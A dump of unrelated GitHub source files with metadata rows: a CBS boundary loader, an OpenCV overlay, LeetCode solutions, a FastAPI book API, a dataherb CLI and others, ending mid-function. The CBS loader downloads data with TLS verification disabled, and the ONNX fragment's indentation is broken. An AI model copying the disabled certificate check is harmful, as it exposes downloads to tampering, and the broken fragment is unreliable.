                        for summary, code in sorted(SNIPPETS[op_type]):
                            s += "<details>\n"
                            s += f"<summary>{summary}</summary>\n\n"
                            s += f"```python\n{code}\n```\n\n"
                            s += "</details>\n"
                            s += "\n\n"
                    if op_type.lower() in SAMPLE_IMPLEMENTATIONS:
                        s += "#### Sample Implementation\n\n"
                        s += "<details>\n"
                        s += f"<summary>{op_type}</summary>\n\n"
                        s += f"```python\n{SAMPLE_IMPLEMENTATIONS[op_type.lower()]}\n```\n\n"
                        s += "</details>\n"
                        s += "\n\n"
                    fout.write(s)
if __name__ == "__main__":
if ONNX_ML:
main(
Args(
"Operators-ml.md",
"Changelog-ml.md",
)
)
main(
Args(
"Operators.md",
"Changelog.md",
)
)
| onnx/onnx | onnx/defs/gen_doc.py | gen_doc.py | py | 16,292 | python | en | code | 15,924 | github-code | 13 |
34774507074 | import os
import zipfile
from urllib.parse import urlsplit
import requests
from django.contrib.gis.gdal import DataSource, OGRGeomType
from django.contrib.gis.geos import MultiPolygon
from django.db import transaction
from signals.apps.dataset.base import AreaLoader
from signals.apps.signals.models import Area, AreaType
class CBSBoundariesLoader(AreaLoader):
    """
    Load municipal (and neighborhood) boundaries as SIA Area instances.

    Downloads the CBS "Wijk- en buurtkaart" ZIP (once), extracts it, and
    imports the requested shapefile layer ("gemeente", "wijk" or "buurt")
    as Area rows with WGS84 MultiPolygon geometries.
    """
    DATASET_URL = 'https://www.cbs.nl/-/media/cbs/dossiers/nederland-regionaal/wijk-en-buurtstatistieken/wijkbuurtkaart_2019_v1.zip'  # noqa
    # Unfortunately, these filenames are not uniformly named over the years,
    # so a hard-coded mapping is provided for the most recent data file (as of
    # this writing 2019).
    DATASET_INFO = {
        'cbs-gemeente-2019': {
            'shp_file': 'gemeente_2019_v1.shp',
            'code_field': 'GM_CODE',
            'name_field': 'GM_NAAM',
        },
        'cbs-wijk-2019': {
            'shp_file': 'wijk_2019_v1.shp',
            'code_field': 'WK_CODE',
            'name_field': 'WK_NAAM',
        },
        'cbs-buurt-2019': {
            'shp_file': 'buurt_2019_v1.shp',
            'code_field': 'BU_CODE',
            'name_field': 'BU_NAAM',
        }
    }
    PROVIDES = DATASET_INFO.keys()

    def __init__(self, type_string, directory):
        """
        type_string: one of PROVIDES; selects the shapefile layer to import.
        directory: scratch dir for download/extraction. Caller is responsible
        to clean up the directory.
        """
        assert type_string in self.PROVIDES
        self.area_type, _ = AreaType.objects.get_or_create(
            name=type_string,
            code=type_string,
            description=f'{type_string} from CBS "Wijk- en buurtkaart" data.',
        )
        self.directory = directory
        dataset_info = self.DATASET_INFO[type_string]
        self.data_file = dataset_info['shp_file']
        self.code_field = dataset_info['code_field']
        self.name_field = dataset_info['name_field']

    def _download(self, zip_fullpath):
        """
        Download the dataset ZIP to zip_fullpath (no-op if already present).
        """
        if os.path.exists(zip_fullpath):
            return  # Datafile already downloaded.

        # SECURITY NOTE: verify=False disables TLS certificate checking for
        # the CBS download; flagged for review rather than silently changed.
        with requests.get(self.DATASET_URL, stream=True, verify=False) as r:
            r.raise_for_status()
            with open(zip_fullpath, 'wb') as f:
                for chunk in r.iter_content(chunk_size=8192):
                    f.write(chunk)

    def _unzip(self, zip_fullpath):
        """
        Extract ZIP file to the scratch directory.
        """
        with zipfile.ZipFile(zip_fullpath, 'r') as zf:
            zf.extractall(path=self.directory)

    def _load_cbs_data(self, data_fullpath):
        """
        Load "gemeente", "wijk" or "buurt" areas from the CBS provided shapefiles.
        """
        ds = DataSource(data_fullpath)
        geom_by_code = {}
        name_by_code = {}
        polygon_type = OGRGeomType('Polygon')
        multipolygon_type = OGRGeomType('MultiPolygon')

        # Collect possible separate geometries representing the area of a
        # single municipality.
        for feature in ds[0]:
            code = feature.get(self.code_field)
            name_by_code[code] = feature.get(self.name_field)

            # Transform to WGS84 and merge if needed.
            transformed = feature.geom.transform('WGS84', clone=True)
            if code in geom_by_code:
                # BUG FIX: OGRGeometry.union() returns a new geometry and does
                # not mutate the receiver, so the result must be assigned back.
                # Previously extra parts of multi-part areas were dropped.
                geom_by_code[code] = geom_by_code[code].union(transformed)
            else:
                geom_by_code[code] = transformed

        # Remove previously imported data, save our merged and transformed
        # municipal boundaries to SIA DB.
        with transaction.atomic():
            Area.objects.filter(_type=self.area_type).delete()

            for code, geometry in geom_by_code.items():
                # Normalize to MultiPolygon so the geometry column is uniform.
                if geometry.geom_type == polygon_type:
                    geos_polygon = geometry.geos
                    geos_geometry = MultiPolygon(geos_polygon)
                elif geometry.geom_type == multipolygon_type:
                    geos_geometry = geometry.geos
                else:
                    raise Exception('Expected either polygon or multipolygon.')

                Area.objects.create(
                    name=name_by_code[code],
                    code=code,
                    _type=self.area_type,
                    geometry=geos_geometry
                )

    def load(self):
        """
        Run the full pipeline: download, unzip, import into the database.
        """
        split_url = urlsplit(self.DATASET_URL)
        zip_name = os.path.split(split_url.path)[-1]
        zip_fullpath = os.path.join(self.directory, zip_name)
        data_fullpath = os.path.join(self.directory, self.data_file)

        self._download(zip_fullpath)
        self._unzip(zip_fullpath)
        self._load_cbs_data(data_fullpath)
| Shoaib0023/signals | api/app/signals/apps/dataset/sources/cbs.py | cbs.py | py | 4,713 | python | en | code | 0 | github-code | 13 |
import cv2 as cv
# Load the two images: the background photo (img1) and the logo (img2).
img1 = cv.imread('D:/PycharmProjects/pythonProject1/Opencv 4.5/images/color2.jpg')
img2 = cv.imread('D:/PycharmProjects/pythonProject1/Opencv 4.5/images/add2.jpg')
# The logo goes in the top-left corner, so take an ROI of the same size there.
rows, cols, channels = img2.shape
roi = img1[0:rows, 0:cols]
# Build a mask of the logo, and its inverse mask.
img2gray = cv.cvtColor(img2, cv.COLOR_BGR2GRAY)  # convert img2 to grayscale
# Threshold the grayscale logo: with THRESH_BINARY, pixels brighter than 10
# become 255 (logo) and the rest become 0 (background).
ret, mask = cv.threshold(img2gray, 10, 255, cv.THRESH_BINARY)  # mask = logo mask
# In cv2.threshold(src, thresh, maxval, type), `type` selects the mode:
# 1. cv2.THRESH_BINARY: value > thresh -> maxval, else 0
# 2. cv2.THRESH_BINARY_INV: value > thresh -> 0, else maxval
# 3. cv2.THRESH_TRUNC: value > thresh -> thresh, else unchanged
# 4. cv2.THRESH_TOZERO: value > thresh -> unchanged, else 0
# 5. cv2.THRESH_TOZERO_INV: value > thresh -> 0, else unchanged
mask_inv = cv.bitwise_not(mask)  # bitwise NOT: the inverse mask
# Black out the logo-shaped area inside the ROI.
img1_bg = cv.bitwise_and(roi, roi, mask=mask_inv)
# Extract only the logo pixels from the logo image.
img2_fg = cv.bitwise_and(img2, img2, mask=mask)
# Combine background and logo, then write the result back into the main image.
dst = cv.add(img1_bg, img2_fg)
img1[0:rows, 0:cols] = dst
cv.imshow('res', img1)
cv.waitKey(0)
cv.waitKey(0)
cv.destroyAllWindows() | Darling1116/Greeting_1116 | Opencv/lesson_3/Add_2.py | Add_2.py | py | 1,684 | python | zh | code | 0 | github-code | 13 |
class Solution:
    """Memoized DFS check that s3 is an interleaving of s1 and s2."""

    def f(self, i, j, k):
        # (i, j, k): number of characters of s1/s2/s3 consumed so far.
        state = (i, j, k)
        if state in self.dp:
            return self.dp[state]
        if i == len(self.s1) and j == len(self.s2) and k == len(self.s3):
            # All three strings fully consumed: valid interleaving found.
            return True
        take_s1 = False
        take_s2 = False
        if i < len(self.s1) and k < len(self.s3) and self.s1[i] == self.s3[k]:
            take_s1 = self.f(i + 1, j, k + 1)
        if j < len(self.s2) and k < len(self.s3) and self.s2[j] == self.s3[k]:
            take_s2 = self.f(i, j + 1, k + 1)
        result = take_s1 or take_s2
        self.dp[state] = result
        return result

    def isInterleave(self, s1: str, s2: str, s3: str) -> bool:
        """Return True iff s3 can be formed by interleaving s1 and s2."""
        self.s1 = s1
        self.s2 = s2
        self.s3 = s3
        self.dp = {}
        return self.f(0, 0, 0)
return self.f(0, 0, 0)
| ritwik-deshpande/LeetCode | 97-interleaving-string/97-interleaving-string.py | 97-interleaving-string.py | py | 849 | python | en | code | 0 | github-code | 13 |
21840373651 | #!/usr/bin/env python3
import sys
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
def main():
    """Build and show a one-row window (greeting label + Quit button) and
    run the Qt event loop, returning its exit status."""
    application = QApplication(sys.argv)
    window = QWidget()
    greeting = QLabel(f"Welcome to Python Gui programming with PyQt {PYQT_VERSION_STR}")
    quit_button = QPushButton("Quit!")
    quit_button.setDefault(True)
    quit_button.clicked.connect(qApp.quit)
    row = QHBoxLayout()
    row.addWidget(greeting)
    row.addWidget(quit_button)
    window.setLayout(row)
    window.setWindowTitle("PyQt5 Programming")
    window.move(100, 100)
    window.show()
    return application.exec()
if __name__ == "__main__":
main()
| mjbhobe/Image_Resources | Gnome/hello.py | hello.py | py | 615 | python | en | code | 0 | github-code | 13 |
73910573139 | import logging
import os
import sys
from collections import OrderedDict
from pathlib import Path
import click
import git
import inquirer
import ruamel.yaml
from ruamel.yaml.representer import RoundTripRepresenter
from dataherb.flora import Flora
from dataherb.parse.utils import (
IGNORED_FOLDERS_AND_FILES,
MESSAGE_CODE,
STATUS_CODE,
)
from dataherb.parse.model_yaml import MetaData
class MyRepresenter(RoundTripRepresenter):
    """Round-trip representer subclass used to register OrderedDict so it
    dumps as a plain YAML mapping (instead of a tagged !!omap)."""
    pass
ruamel.yaml.add_representer(
    OrderedDict, MyRepresenter.represent_dict, representer=MyRepresenter
)
yaml = ruamel.yaml.YAML()
yaml.Representer = MyRepresenter
# Directory containing this module (not the process CWD, despite the name).
__CWD__ = Path(__file__).parent.resolve()
logging.basicConfig()
logger = logging.getLogger("dataherb.command")
def describe_file(file):
    """Interactively ask the user to describe one data file.

    Returns a dict with the file's display name, description and
    last-updated ISO date (values may be None if the prompt was skipped).
    """
    answers = inquirer.prompt(
        [
            inquirer.Text("name", message=f"How would you like to name the file: {file}?"),
            inquirer.Text("description", message=f"What is {file} about?"),
            inquirer.Text(
                "updated_at",
                message=f"When was {file} last updated? In ISO date format such as 2020-02-17.",
            ),
        ]
    )
    return {
        "name": answers.get("name"),
        "description": answers.get("description"),
        "updated_at": answers.get("updated_at"),
    }
def describe_dataset():
    """Ask the user for the dataset's basic info.

    Returns a dict with 'name' and 'description' (empty strings when the
    prompt yields nothing).
    """
    prompts = [
        inquirer.Text("name", message="How would you like to name the dataset?"),
        inquirer.Text(
            "description",
            message="What is the dataset about? This will be the description of the dataset.",
        ),
    ]
    replies = inquirer.prompt(prompts)
    return {
        "name": replies.get("name", ""),
        "description": replies.get("description", ""),
    }
def where_is_dataset():
    """
    where_is_dataset asks the user where the dataset is located.

    If candidate folders are found, presents them as a choice list;
    otherwise asks the user to type a directory path.
    """
    try:
        folders = []
        # NOTE(review): this walks __CWD__ (the package directory, see module
        # top) but computes paths relative to "." (the process CWD) — when
        # the two differ the displayed choices look odd; confirm intent.
        for root, dirs, files in os.walk(__CWD__):
            for d in dirs:
                if d not in IGNORED_FOLDERS_AND_FILES:
                    folders.append(os.path.relpath(os.path.join(root, d), "."))
    except Exception as e:
        # Best effort: fall back to the free-form path prompt below.
        logger.error("Can not get a list of folders in current directory.")
        folders = []
    # Hidden folders (and paths starting with '.') are never offered.
    folders = [i for i in folders if not i.startswith(".")]
    if folders:
        questions = [
            inquirer.List(
                "dataset_folder",
                message="Which folder contains the data file?",
                choices=folders,
            )
        ]
    else:
        questions = [
            inquirer.Path(
                "dataset_folder",
                message="Which folder will you place the data files?",
                path_type=inquirer.Path.DIRECTORY,
            )
        ]
    answers = inquirer.prompt(questions)
    dataset_folder = answers.get("dataset_folder")
    return dataset_folder
# _FLORA.herb("geonames_timezone").leaves.get("dataset/geonames_timezone.csv").data
@click.group(invoke_without_command=True)
@click.pass_context
def dataherb(ctx):
    # Root click group: with no subcommand, greet the user; otherwise
    # announce which subcommand is about to run.
    if ctx.invoked_subcommand is None:
        click.echo("Hello {}".format(os.environ.get("USER", "")))
        click.echo("Welcome to DataHerb.")
    else:
        click.echo("Loading Service: %s" % ctx.invoked_subcommand)
@dataherb.command()
@click.argument("keywords", required=False)
@click.option("--id", "-i", default=False)
def search(id=None, keywords=None):
    """
    search datasets on DataHerb by keywords or id

    Without --id, performs a keyword search and prints a summary of each
    match; with --id, fetches and prints that single herb's metadata.
    """
    # NOTE(review): --id defaults to False (not None) and shadows the id()
    # builtin inside this function; only its truthiness is used below.
    SHOW_KEYS = ["name", "description", "contributors"]
    fl = Flora()
    if not id:
        click.echo("Searching Herbs in DataHerb Flora ...")
        results = fl.search(keywords)
        click.echo(f"Found {len(results)} results")
        if not results:
            click.echo(f"Could not find dataset related to {keywords}")
        else:
            for result in results:
                result_metadata = result.get("herb").metadata()
                click.echo(f'DataHerb ID: {result_metadata.get("id")}')
                # yaml.dump writes directly to sys.stdout; its return value
                # (presumably None) is what click.echo receives — confirm
                # the extra blank line is intended.
                click.echo(
                    yaml.dump(
                        OrderedDict((key, result_metadata[key]) for key in SHOW_KEYS),
                        sys.stdout,
                    )
                )
    else:
        click.echo(f"Fetching Herbs {id} in DataHerb Flora ...")
        result = fl.herb(id)
        if not result:
            click.echo(f"Could not find dataset with id {id}")
        else:
            result_metadata = result.metadata()
            click.echo(f'DataHerb ID: {result_metadata.get("id")}')
            click.echo(yaml.dump(result_metadata, sys.stdout))
@dataherb.command()
@click.argument("id", required=True)
def download(id):
    """
    download dataset using id

    Looks the herb up in the Flora index and clones its GitHub repository
    into ./<owner>/<repo>, refusing to overwrite an existing clone.
    """
    fl = Flora()
    click.echo(f"Fetching Herbs {id} in DataHerb Flora ...")
    result = fl.herb(id)
    if not result:
        click.echo(f"Could not find dataset with id {id}")
    else:
        result_metadata = result.metadata()
        click.echo(f'Downloading DataHerb ID: {result_metadata.get("id")}')
        result_repository = result_metadata.get("repository")
        dest_folder = f"./{result_repository}"
        if os.path.exists(dest_folder):
            click.echo(f"Can not download dataset to {dest_folder}: folder exists.")
        else:
            dest_folder_parent = f"./{result_repository.split('/')[0]}"
            # BUG FIX: exist_ok=True — a previous download of another dataset
            # from the same owner leaves the parent folder in place, and
            # os.makedirs() would then raise FileExistsError even though
            # dest_folder itself is free.
            os.makedirs(dest_folder_parent, exist_ok=True)
            git.Git(dest_folder_parent).clone(
                f"https://github.com/{result_repository}.git"
            )
@dataherb.command()
@click.confirmation_option(
    prompt=f"Your current working directory is {__CWD__}\n"
    "The .dataherb folder will be created right here.\n"
    "Are you sure this is the correct path?"
)
def create():
    """
    creates metadata for current dataset

    Interactive flow: describe the dataset, pick the data folder, describe
    each data file found there, then write .dataherb/metadata.yml.
    """
    md = MetaData()
    dataset_basics = describe_dataset()
    print(dataset_basics)
    md.template.update(dataset_basics)
    dataset_folder = where_is_dataset()
    print(f"Looking into the folder {dataset_folder} for data files...")
    dataset_files = md.parse_structure(dataset_folder)
    print(f"found {dataset_files} in {dataset_folder}")
    # One metadata "leaf" per data file, described interactively.
    for file in dataset_files:
        file_meta = describe_file(file)
        md.append_leaf(os.path.join(dataset_folder, file), file_meta)
    md.create()
    click.echo(
        "The .dataherb folder and metadata.yml file has been created inside \n"
        f"{__CWD__}\n"
        "Please review the metadata.yml file and update other necessary fields of your desire."
    )
@dataherb.command()
@click.option("-v", "--verbose", type=str, default="warning")
def validate(verbose):
    """
    validates the existing metadata for current dataset
    """
    click.secho(
        f"Your current working directory is {__CWD__}\n"
        "I will look for the .dataherb folder right here.\n",
        bold=True,
    )
    ALL_VERBOSE = ["warning", "error", "all"]
    if verbose not in ALL_VERBOSE:
        # NOTE(review): an invalid -v value is only logged; execution
        # continues and then matches no branch below, so nothing is echoed —
        # confirm whether this should abort instead.
        logger.error(f"-v or --verbose can only take one of {ALL_VERBOSE}")
    md = MetaData()
    # NOTE: this local shadows the `validate` command function itself.
    validate = md.validate()
    def echo_summary(key, value_dict, bg=None, fg=None):
        # Pretty-print one validation entry; bg colour encodes severity.
        if bg is None:
            bg = "black"
        if fg is None:
            fg = "white"
        return click.secho(
            f' {key}: {value_dict.get("value")}\n'
            f' STATUS: {value_dict.get("status")};\n'
            f' MESSAGE: {value_dict.get("message")}',
            bg=bg,
            fg=fg,
        )
    click.secho("Summary: validating metadata:\n- data:", bold=True)
    for val in validate.get("data"):
        for val_key, val_val in val.items():
            # Verbosity matrix: successes only at -v all, warnings at
            # -v warning, errors at -v warning or -v error.
            if (val_val.get("status") == STATUS_CODE["SUCCESS"]) and (verbose == "all"):
                echo_summary(val_key, val_val, bg="green")
            elif (val_val.get("status") == STATUS_CODE["WARNING"]) and (
                verbose == "warning"
            ):
                echo_summary(val_key, val_val, bg="magenta")
            elif (val_val.get("status") == STATUS_CODE["ERROR"]) and (
                verbose in ["warning", "error"]
            ):
                echo_summary(val_key, val_val, bg="red")
    click.secho(
        "The .dataherb folder and metadata.yml file \n"
        f"{__CWD__}\n"
        " has been validated. Please read the summary and fix the errors.",
        bold=True,
    )
| DataHerb/dataherb-python | dataherb/deprecation/command.py | command.py | py | 8,475 | python | en | code | 3 | github-code | 13 |
# 1. Write a program that removes from a text every word containing a given
#    substring ("абв" in the examples). Words are separated by a space.
# in
# Number of words: 10
# out
# авб абв бав абв вба бав вба абв абв абв
# авб бав вба бав вба
# in
# Number of words: 6
# out
# ваб вба абв ваб бва абв
# ваб вба ваб бва
import random
# The word to filter out; its letters are also used to build random words.
txt = input('Какое слово нужно удалить? ')
num_w = (int(input('Сколько составить слов: ')))
list_w = []
print('Tекст: ')
for i in range(num_w):
    # random.sample picks 3 distinct characters of `txt` in random order.
    random_txt = random.sample(txt, 3)
    list_w.append("".join(random_txt))
print(" ".join(list_w))
print("Полученный текст: ")
# Keep only the words that do not contain `txt` as a substring.
list_w2 = list(filter(lambda x: txt not in x, list_w))
print(" ".join(list_w2)) | YuliyaBorovaya/PythonHomework | HomeWork5/Task1.py | Task1.py | py | 887 | python | ru | code | 0 | github-code | 13 |
35654405968 | # -*- coding: utf-8 -*-
class BankNote(object):
    """A bank note: a face value plus the images of its two sides."""

    def __init__(self, value, front, back):
        # `sides` keeps the side images in [front, back] order.
        self.sides = [front, back]
        self.value = value
# Catalogue of the supported notes (front/back images live under img/).
note_10 = BankNote(10, 'img/10f.jpg', 'img/10b.jpg')
note_20 = BankNote(20, 'img/20f.jpg', 'img/20b.jpg')
note_50 = BankNote(50, 'img/50f.jpg', 'img/50b.jpg')
# Lookup by face value.
notes = {
    10 : note_10,
    20 : note_20,
    50 : note_50
}
# Lookup by dominant note colour. NOTE(review): the colour-to-value mapping
# is asserted here without a source — confirm against the note images.
note_colors = {
    "Yellow" : note_10,
    "Red" : note_20,
    "Green" : note_50
}
| Blondwolf/NoteCounterCHF | src/aborted/standalone/banknote.py | banknote.py | py | 511 | python | en | code | 0 | github-code | 13 |
3214482974 | from fastapi import FastAPI
from pydantic import BaseModel, Field
from uuid import UUID
import uvicorn
from typing import Optional
app = FastAPI()
# Field adds per-column validation so input is rejected unless it matches.
class Book(BaseModel):
    """Request/response model for one book record."""
    id: UUID
    title: str = Field(min_length=1) # title must be at least one character
    author: str = Field(min_length=1, max_length=100) # author length must be 1..100
    # NOTE(review): the field name 'descripiton' is misspelled (the schema
    # example below uses 'description'); renaming would break existing
    # payloads and create_books_no_api(), so it is left as-is.
    descripiton: Optional[str] = Field(title="Description of the book",
                                       max_length=100,
                                       min_length=1) # description
    rating: int = Field(gt=-1, lt=101) # rating must be between 0 and 100 inclusive
    class Config:
        # Example payload shown in the OpenAPI docs.
        schema_extra = {
            "example": {
                "id":"ea5209b0-818c-4519-989b-0f10d8081a39",
                "title": "Computer Science Pro",
                "author": "learning with Rody",
                "description": "A very nyc descripition of the book",
                "rating": 100
            }
        }
# In-memory "database"; populated lazily by create_books_no_api().
BOOKS = []
@app.get('/book')
async def read_all_books(books_to_return: Optional[int] = None):
    """Return all books, or only the first `books_to_return` of them when a
    valid count (1..len(BOOKS)) is given; seeds demo data on first call."""
    if not BOOKS:
        create_books_no_api()
    if books_to_return and 0 < books_to_return <= len(BOOKS):
        return BOOKS[:books_to_return]
    return BOOKS
@app.post('/')
async def create_book(book: Book):
    # Append the validated book and echo back the whole collection.
    BOOKS.append(book)
    return BOOKS
@app.get("/book/{book_id}")
async def read_book(book_id:UUID):
for x in BOOKS:
if x.id == book_id:
return x
@app.put("/{book_id}")
async def update_book(bookd_id: UUID, book:Book):
for index,b in enumerate(BOOKS):
if b.id == bookd_id:
BOOKS[index] = book
return BOOKS
@app.delete("/book/{delete_book_id}")
async def delete_book(delete_book_id: UUID, book:Book):
for index, b in enumerate(BOOKS):
if b.id == delete_book_id:
BOOKS.pop(index)
return BOOKS
def create_books_no_api():
    """Seed BOOKS with four demo entries (called when the list is empty).

    Bug fix: book4 previously reused book3's UUID (…a39), so book4 could
    never be fetched, updated or deleted by id; it now follows the
    …a19/…a29/…a39/…a49 sequence.
    """
    book1 = Book(id="ea5209b0-818c-4519-989b-0f10d8081a19",
                 title="Title 1",
                 author="Author 1",
                 descripiton="Descripton 1",
                 rating=60)
    book2 = Book(id="ea5209b0-818c-4519-989b-0f10d8081a29",
                 title="Title 2",
                 author="Author 3",
                 descripiton="Descripton 2",
                 rating=70)
    book3 = Book(id="ea5209b0-818c-4519-989b-0f10d8081a39",
                 title="Title 3",
                 author="Author 3",
                 descripiton="Descripton 3",
                 rating=80)
    book4 = Book(id="ea5209b0-818c-4519-989b-0f10d8081a49",
                 title="Title 4",
                 author="Author 4",
                 descripiton="Descripton 4",
                 rating=90)
    BOOKS.append(book1)
    BOOKS.append(book2)
    BOOKS.append(book3)
    BOOKS.append(book4)
if __name__ == "__main__":
uvicorn.run("practice2:app", reload=True) | nvp1394/fast-api | Code Source/FastAPI/practice2.py | practice2.py | py | 3,159 | python | en | code | 0 | github-code | 13 |
74024440979 | import Levenshtein
import sys
import os
import re
# Directory with prediction/label files, taken from the first CLI argument.
PATH_OUTPUT_AUDIO_TEST = './' + sys.argv[1] + '/'
# NOTE(review): these module-level accumulators are shadowed by locals of the
# same names inside calculate_edit_distance() and appear otherwise unused.
num_editops_list = []
num_normal_editops_list = []
num_wav_files = 0
dir_dict = {}
def calculate_edit_distance(path_output_audio_test, prediction_file_ending='prediction', max_number_points_to_plot=-1):
    """Print per-file edit-distance stats for prediction/label file pairs.

    Scans *path_output_audio_test* for files whose name contains
    *prediction_file_ending*, pairs each with its ``_label`` counterpart,
    and prints both the plain Levenshtein distance and an
    insert/delete-only distance (each 'replace' counts as two operations).

    :param path_output_audio_test: directory to scan (with trailing separator).
    :param prediction_file_ending: substring marking prediction files.
    :param max_number_points_to_plot: process at most this many pairs;
        non-positive means "all".
    :return: list of plain Levenshtein distances, one per processed pair.
    """
    num_editops_list = []
    num_normal_editops_list = []
    num_wav_files = 0
    dir_dict = {}
    for e in os.listdir(path_output_audio_test):
        if '.wav' in e:
            num_wav_files += 1
        if prediction_file_ending in e:
            # Key each prediction file by the digits embedded in its name.
            all_ids_file = ''.join(c for c in e if c.isdigit())
            dir_dict[all_ids_file] = e
    # BUGFIX: the old slice [:max_number_points_to_plot] with the default -1
    # silently dropped the *last* file; non-positive now means "no limit".
    limit = max_number_points_to_plot if max_number_points_to_plot > 0 else None
    for e in sorted(dir_dict, key=int)[:limit]:
        filename_prediction = dir_dict[e]
        filename_label = filename_prediction.replace(prediction_file_ending, '_label')
        with open(path_output_audio_test + filename_prediction, 'r') as f:
            prediction_raw = f.read()
        if len(sys.argv) > 2 and sys.argv[2] == '--except_predict_search':
            match = re.search(r"(\w(\ |\w|\')*\w)", prediction_raw)
            if match is None:
                # BUGFIX: the old try/except-pass silently reused the
                # *previous* file's prediction; skip this file instead.
                continue
            prediction = match.group(1)
        else:
            prediction = re.search(r"(\w(\ |\w|\')*\w)", prediction_raw).group(1)
        with open(path_output_audio_test + filename_label, 'r') as f:
            label_raw = f.read()
        label = re.search(r"(\w(\ |\w|\')*\w)", label_raw).group(1).replace('_', ' ')
        editops = Levenshtein.editops(prediction, label)
        print()
        print(filename_prediction.replace(prediction_file_ending, ''))
        print(prediction_file_ending + ': ' + prediction)
        print('label: ' + label)
        print('editops: ' + str(editops))
        print('Normal Levenshtein distance: ' + str(len(editops)))
        num_normal_editops_list.append(len(editops))
        # Insert/delete-only distance: a 'replace' = one delete + one insert.
        num_editops = 0
        for op in editops:
            num_editops += 1
            if op[0] == 'replace':
                num_editops += 1
        print('insert-delete-editdistance (num_editops): ' + str(num_editops))
        num_editops_list.append(num_editops)
    # NOTE(review): still raises ZeroDivisionError when no pairs were found —
    # unchanged from the original behavior.
    avg_num_editops = (sum(num_editops_list)/len(num_editops_list))
    avg_num_normal_editops = (sum(num_normal_editops_list)/len(num_normal_editops_list))
    print('\n\n')
    print('Number of .wav files: ' + str(num_wav_files))
    print('Average number insert delete editops: **{:.2f}**'.format(avg_num_editops))
    print('Average Levenshtein editops: **{:.2f}**'.format(avg_num_normal_editops))
    return num_normal_editops_list
if __name__ == '__main__':
calculate_edit_distance(PATH_OUTPUT_AUDIO_TEST)
| Fraunhofer-AISEC/towards-resistant-audio-adversarial-examples | score.py | score.py | py | 2,845 | python | en | code | 9 | github-code | 13 |
18162686545 | # REF : https://leetcode.com/problems/validate-binary-search-tree/
# NOTES :
# Need to compare given node with updated UPPER BOUND and LOWER BOUND
# Like "Count good nodes in BT" deque stack will have now two more elements
# [node, low, high] to implement iterative DFS/BFS solution
from collections import deque
# T: O(n)
# S: O(n)
# DFS recursive
class TreeNode:
    """Node of a binary tree: a value plus optional left/right children."""
    def __init__(self, val=0, left=None, right=None):
        self.val = val      # payload value of this node
        self.left = left    # left child (TreeNode or None)
        self.right = right  # right child (TreeNode or None)
class Solution:
    """Validate a binary search tree via bounded recursive DFS."""

    def isValidBST(self, root) -> bool:
        """Return True iff every node's value lies strictly between the
        open bounds inherited from its ancestors."""
        def within(node, lo, hi):
            # An empty subtree is trivially valid.
            if node is None:
                return True
            # The node must sit strictly inside the open interval (lo, hi).
            if node.val <= lo or node.val >= hi:
                return False
            # Left subtree tightens the upper bound, right the lower one.
            return within(node.left, lo, node.val) and within(node.right, node.val, hi)

        return within(root, float("-inf"), float("inf"))
# T: O(n)
# S: O(n)
# DFS iterative & BFS iterative with popleft change
class Solution2:
    """Validate a binary search tree iteratively with an explicit stack."""

    def isValidBST(self, root) -> bool:
        """Depth-first traversal carrying (node, low, high) bound tuples;
        using popleft() instead of pop() would make this breadth-first."""
        if root is None:
            return True
        stack = deque()
        stack.append((root, float("-inf"), float("inf")))
        while stack:
            node, lo, hi = stack.pop()
            # Every value must lie strictly inside its inherited bounds.
            if node.val <= lo or node.val >= hi:
                return False
            if node.left is not None:
                stack.append((node.left, lo, node.val))
            if node.right is not None:
                stack.append((node.right, node.val, hi))
        return True
def main():
pass
if __name__ == "__main__":
main() | PawanKmr470/dsa | py_drill/Problems/TR01_ValidateBST.py | TR01_ValidateBST.py | py | 1,601 | python | en | code | 0 | github-code | 13 |
32810860961 | import json
from optparse import make_option
import sys
from socket import error as socket_error
import codecs
import unicodedata
import requests
from django.core.management.base import BaseCommand, CommandError
from ui.models import TwitterUser, TwitterUserItem, TwitterUserItemUrl
from ui.utils import make_date_aware
from queryset_iterator import queryset_iterator
class Command(BaseCommand):
help = 'fetch expanded urls for tweets with urls in text'
option_list = BaseCommand.option_list + (
make_option('--start-date', action='store', default=None,
type='string', dest='start_date',
help='earliest date (YYYY-MM-DD) for export'),
make_option('--end-date', action='store', default=None,
type='string', dest='end_date',
help='latest date (YYYY-MM-DD) for export'),
make_option('--twitter-user', action='store', default=None,
type='string', dest='twitter_user',
help='username to export'),
make_option('--limit', action='store', default=0,
type='int', dest='limit',
help='max number of links to check'),
make_option('--refetch', action='store_true', default=False,
help='refetch urls that have been fetched before'),
)
def handle(self, *args, **options):
twitter_user = None
start_dt = None
end_dt = None
if options['twitter_user']:
try:
twitter_user = TwitterUser.objects.get(
name=options['twitter_user'])
except TwitterUser.DoesNotExist:
raise CommandError('TwitterUser %s does not exist' %
options['twitter_user'])
if options['start_date']:
start_dt = make_date_aware(options['start_date'])
if not start_dt:
raise CommandError('dates must be in the format YYYY-MM-DD')
else:
start_dt = None
if options['end_date']:
end_dt = make_date_aware(options['end_date'])
if not end_dt:
raise CommandError('dates must be in the format YYYY-MM-DD')
else:
end_dt = None
if start_dt and end_dt:
if end_dt < start_dt:
raise CommandError('start date must be earlier than end date')
if twitter_user:
qs = twitter_user.items.all()
else:
qs = TwitterUserItem.objects.all()
if not options['refetch']:
qs = qs.filter(urls__isnull=True)
if start_dt:
qs = qs.filter(date_published__gte=start_dt)
if end_dt:
qs = qs.filter(date_published__lte=end_dt)
qs = queryset_iterator(qs)
count = 0
for tui in qs:
urls = []
urls.extend(tui.tweet['entities']['urls'])
if 'media' in tui.tweet['entities'].keys():
urls.extend(tui.tweet['entities']['media'])
if not urls:
# use of entities.urls was spotty at first
for u in tui.links:
if ('...' in unicodedata.normalize('NFKD', u).encode('ascii','ignore')
and tui.tweet['retweet_count'] > 0) :
continue
urls.append({'url': u, 'expanded_url': u})
for url in urls:
try:
r = requests.head(url['expanded_url'],
allow_redirects=True,
timeout=10)
if r.status_code == 405:
r = requests.get(url['expanded_url'],
allow_redirects=True,
stream=True, timeout=10)
r.close()
req_history_headers = []
for req in r.history:
req_headers = self.decode_headers(req.headers, req.encoding)
req_history_headers.append((
req.status_code,
req.url,
req_headers))
final_req_headers = self.decode_headers(r.headers, r.encoding)
tuiu = TwitterUserItemUrl(
item=tui,
start_url=url['url'],
expanded_url=url['expanded_url'],
history=json.dumps(req_history_headers),
final_url=r.url,
final_status=r.status_code,
final_headers=json.dumps(final_req_headers),
duration_seconds=r.elapsed.total_seconds())
tuiu.save()
except (requests.RequestException) as e:
# TODO: consider trapping/recording
